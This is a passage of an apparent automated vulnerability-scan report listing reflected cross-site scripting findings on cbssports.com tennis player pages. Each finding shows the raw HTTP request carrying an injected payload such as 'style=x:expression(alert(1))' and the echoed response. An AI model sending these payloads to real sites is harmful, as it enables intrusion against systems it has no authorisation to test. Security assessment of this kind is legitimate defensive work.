Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:32 GMT
Server: Apache
Set-Cookie: last_access=1303946372; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:32 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 132988

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis14a05"style="x:expression(alert(1))"013071ef33a/players/playerpage/566165">
...[SNIP]...

3.750. http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65f11"style%3d"x%3aexpression(alert(1))"4009d3290ef was submitted in the REST URL parameter 2. This input was echoed as 65f11"style="x:expression(alert(1))"4009d3290ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis/players65f11"style%3d"x%3aexpression(alert(1))"4009d3290ef/playerpage/566165 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:34 GMT
Server: Apache
Set-Cookie: last_access=1303946374; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:34 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 91992

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com Scoreboard,
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis/players65f11"style="x:expression(alert(1))"4009d3290ef/playerpage/566165">
...[SNIP]...

3.751. http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5487c"style%3d"x%3aexpression(alert(1))"4b225cee9c7 was submitted in the REST URL parameter 3. This input was echoed as 5487c"style="x:expression(alert(1))"4b225cee9c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis/players/playerpage5487c"style%3d"x%3aexpression(alert(1))"4b225cee9c7/566165 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:41 GMT
Server: Apache
Set-Cookie: last_access=1303946381; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:41 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 91940

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis Players - CBSSports.com </t
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis/players/playerpage5487c"style="x:expression(alert(1))"4b225cee9c7/566165">
...[SNIP]...

3.752. http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78252"style%3d"x%3aexpression(alert(1))"fe7a2704295 was submitted in the REST URL parameter 4. This input was echoed as 78252"style="x:expression(alert(1))"fe7a2704295 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis/players/playerpage/56616578252"style%3d"x%3aexpression(alert(1))"fe7a2704295 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:45 GMT
Server: Apache
Set-Cookie: last_access=1303946385; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:45 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 105024

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com </title>

...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis/players/playerpage/56616578252"style="x:expression(alert(1))"fe7a2704295">
...[SNIP]...

3.753. http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d1b1"%3b0b1fd0939a was submitted in the REST URL parameter 4. This input was echoed as 2d1b1";0b1fd0939a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /tennis/players/playerpage/5661652d1b1"%3b0b1fd0939a HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:46 GMT
Server: Apache
Set-Cookie: last_access=1303946386; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:46 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 104020

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com </title>

...[SNIP]...
cript type="text/javascript">
// Bind comments section; on page load, get the initial data and display:
$(document).ready( function (e) { CBSi.app.jqComments.init({
   sort:"newest",
   cid:"5661652d1b1";0b1fd0939a",
   maxCount: 10,
   arena: "tennis",
   contentType: "p",

   // Note the author ones below cannot be cached, they must come from a data provider
   myAuthorID: "",
   isAdmin: "",
   canReportPost: "",
   canWarn:
...[SNIP]...

3.754. http://www.cbssports.com/tennis/players/playerpage/566165 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ed92'%3b25213010165 was submitted in the REST URL parameter 4. This input was echoed as 9ed92';25213010165 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /tennis/players/playerpage/5661659ed92'%3b25213010165 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:47 GMT
Server: Apache
Set-Cookie: last_access=1303946387; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:47 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 104046

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com </title>

...[SNIP]...

DW.pageParams = {
siteid: '175',
onid: '23431',
ptid: '6866',
ctype: 'pj;vd;arn;ev;sl;ft',
cval: 'media;spln;tennis;reg;free;playerprofiles',
asid: '5661659ed92';25213010165',
astid: '48',
ursuid: '',
pguid: 'Tbikkwq0GW4AAEAI3j8' ,
testname: 'scrapjax',
testgroup: 'sysOn',
testversion: 'p1'
}
DW.clear();

if ( typeof(cbsiAdBehavioralSetup) != 'und
...[SNIP]...

3.755. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b756f"style%3d"x%3aexpression(alert(1))"59c257d6aae was submitted in the REST URL parameter 1. This input was echoed as b756f"style="x:expression(alert(1))"59c257d6aae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennisb756f"style%3d"x%3aexpression(alert(1))"59c257d6aae/players/playerpage/566165/2011/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:35 GMT
Server: Apache
Set-Cookie: last_access=1303946375; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:35 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 133110

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennisb756f"style="x:expression(alert(1))"59c257d6aae/players/playerpage/566165/2011/victoria-azarenka">
...[SNIP]...

3.756. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63ba6"style%3d"x%3aexpression(alert(1))"01bbcb4af89 was submitted in the REST URL parameter 2. This input was echoed as 63ba6"style="x:expression(alert(1))"01bbcb4af89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis/players63ba6"style%3d"x%3aexpression(alert(1))"01bbcb4af89/playerpage/566165/2011/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:37 GMT
Server: Apache
Set-Cookie: last_access=1303946377; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:37 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 92115

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com Scoreboard,
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis/players63ba6"style="x:expression(alert(1))"01bbcb4af89/playerpage/566165/2011/victoria-azarenka">
...[SNIP]...

3.757. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b18e"style%3d"x%3aexpression(alert(1))"5c30f0a00b2 was submitted in the REST URL parameter 3. This input was echoed as 4b18e"style="x:expression(alert(1))"5c30f0a00b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tennis/players/playerpage4b18e"style%3d"x%3aexpression(alert(1))"5c30f0a00b2/566165/2011/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:44 GMT
Server: Apache
Set-Cookie: last_access=1303946384; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:44 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 92437

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis Players - CBSSports.com </t
...[SNIP]...
<link rel="canonical" href="http://www.cbssports.com/tennis/players/playerpage4b18e"style="x:expression(alert(1))"5c30f0a00b2/566165/2011/victoria-azarenka">
...[SNIP]...

3.758. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39e94'%3b0cf395c39ee was submitted in the REST URL parameter 4. This input was echoed as 39e94';0cf395c39ee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /tennis/players/playerpage/56616539e94'%3b0cf395c39ee/2011/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:49 GMT
Server: Apache
Set-Cookie: last_access=1303946389; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:49 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 104637

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com </title>

...[SNIP]...

DW.pageParams = {
siteid: '175',
onid: '23431',
ptid: '6866',
ctype: 'pj;vd;arn;ev;sl;ft',
cval: 'media;spln;tennis;reg;free;playerprofiles',
asid: '56616539e94';0cf395c39ee',
astid: '48',
ursuid: '',
pguid: 'TbiklQq0GW4AAFKSCoA' ,
testname: 'scrapjax',
testgroup: 'sysOn',
testversion: 'p1'
}
DW.clear();

if ( typeof(cbsiAdBehavioralSetup) != 'und
...[SNIP]...

3.759. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebe7"%3b6e5ffa7528e was submitted in the REST URL parameter 4. This input was echoed as 4ebe7";6e5ffa7528e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /tennis/players/playerpage/5661654ebe7"%3b6e5ffa7528e/2011/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:48 GMT
Server: Apache
